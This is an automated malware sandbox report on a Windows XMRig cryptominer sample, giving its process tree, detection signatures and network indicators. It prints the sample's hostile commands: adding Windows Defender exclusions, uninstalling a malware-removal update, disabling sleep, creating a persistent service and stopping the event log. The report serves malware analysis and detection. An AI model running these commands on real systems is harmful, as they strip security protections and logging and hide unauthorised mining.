Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4o8Tgrb384.exe

Overview

General Information

Sample name:4o8Tgrb384.exe
renamed because original name is a hash value
Original sample name:414d3083ff99da1b26c198f1bcea1b5824f8a083fd57420781e21e539b5bbf1b.exe
Analysis ID:1557203
MD5:ee26108b32d7b5e5c1f47e51fd11dba2
SHA1:0744a751814fe469254d4d8336f32243f8e1b395
SHA256:414d3083ff99da1b26c198f1bcea1b5824f8a083fd57420781e21e539b5bbf1b
Tags:exeuser-Chainskilabs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4o8Tgrb384.exe (PID: 6796 cmdline: "C:\Users\user\Desktop\4o8Tgrb384.exe" MD5: EE26108B32D7B5E5C1F47E51FD11DBA2)
    • powershell.exe (PID: 1148 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2508 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6348 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2772 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3984 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3020 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7032 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3572 cmdline: C:\Windows\system32\sc.exe delete "QVYJPHJR" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3428 cmdline: C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6748 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6780 cmdline: C:\Windows\system32\sc.exe start "QVYJPHJR" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • atpljrtdlbzl.exe (PID: 4300 cmdline: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe MD5: EE26108B32D7B5E5C1F47E51FD11DBA2)
    • powershell.exe (PID: 4080 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4508 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3344 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2060 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2944 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3636 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2352 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 5184 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            39.2.svchost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              39.2.svchost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x370008:$a1: mining.set_target
              • 0x362230:$a2: XMRIG_HOSTNAME
              • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
              • 0x362208:$a4: XMRIG_VERSION
              39.2.svchost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
              39.2.svchost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
              • 0x3b9600:$s3: \\.\WinRing0_
              • 0x3671a8:$s4: pool_wallet
              • 0x3615d8:$s5: cryptonight
              • 0x3615e8:$s5: cryptonight
              • 0x3615f8:$s5: cryptonight
              • 0x361608:$s5: cryptonight
              • 0x361620:$s5: cryptonight
              • 0x361630:$s5: cryptonight
              • 0x361640:$s5: cryptonight
              • 0x361658:$s5: cryptonight
              • 0x361668:$s5: cryptonight
              • 0x361680:$s5: cryptonight
              • 0x361698:$s5: cryptonight
              • 0x3616a8:$s5: cryptonight
              • 0x3616b8:$s5: cryptonight
              • 0x3616c8:$s5: cryptonight
              • 0x3616e0:$s5: cryptonight
              • 0x3616f8:$s5: cryptonight
              • 0x361708:$s5: cryptonight
              • 0x361718:$s5: cryptonight

              Sigma Signatures

              Change of critical system settings

              barindex
              Sigma detected: Disable power options
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2772, ProcessName: powercfg.exe

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1148, ProcessName: powershell.exe
              Sigma detected: Suspect Svchost Activity
              Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentImage: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentProcessId: 4300, ParentProcessName: atpljrtdlbzl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5184, ProcessName: svchost.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1148, ProcessName: powershell.exe
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentImage: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentProcessId: 4300, ParentProcessName: atpljrtdlbzl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5184, ProcessName: svchost.exe
              Sigma detected: New Service Creation Using Sc.EXE
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto", ProcessId: 3428, ProcessName: sc.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1148, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentImage: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentProcessId: 4300, ParentProcessName: atpljrtdlbzl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5184, ProcessName: svchost.exe

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Stop EventLog
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6748, ProcessName: sc.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeReversingLabs: Detection: 63%
              Multi AV Scanner detection for submitted file
              Source: 4o8Tgrb384.exeReversingLabs: Detection: 63%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

              Bitcoin Miner

              barindex
              Yara detected Xmrig cryptocurrency miner
              Source: Yara matchFile source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5184, type: MEMORYSTR
              DNS related to crypt mining pools
              Source: unknownDNS query: name: xmr-eu1.nanopool.org
              Found strings related to Crypto-Mining
              Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: svchost.exeString found in binary or memory: cryptonight/0
              Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
              Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: 4o8Tgrb384.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmp
              Source: global trafficTCP traffic: 192.168.2.8:49705 -> 51.89.23.91:10343
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
              Source: svchost.exe, 00000027.00000003.2648761950.000001B0C38A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.2549406993.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
              Source: svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
              Source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: svchost.exe, 00000027.00000003.2648761950.000001B0C38A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.2549406993.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
              Source: svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
              Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 5184, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Uses powercfg.exe to modify the power settings
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeCode function: 0_2_00007FF67C751394 NtOpenThread,0_2_00007FF67C751394
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeCode function: 24_2_00007FF62D5F1394 NtRollbackComplete,24_2_00007FF62D5F1394
              Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000000140001394 NtCreateEnlistment,37_2_0000000140001394
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeFile created: C:\Windows\TEMP\iwttnaazwiuc.sysJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_bdfyvat2.j1j.ps1
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeCode function: 0_2_00007FF67C753B500_2_00007FF67C753B50
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeCode function: 24_2_00007FF62D5F3B5024_2_00007FF62D5F3B50
              Source: C:\Windows\System32\conhost.exeCode function: 37_2_000000014000315037_2_0000000140003150
              Source: C:\Windows\System32\conhost.exeCode function: 37_2_00000001400026E037_2_00000001400026E0
              Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\iwttnaazwiuc.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeCode function: String function: 00007FF67C751394 appears 33 times
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeCode function: String function: 00007FF62D5F1394 appears 33 times
              Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: Process Memory Space: svchost.exe PID: 5184, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@58/12@1/1
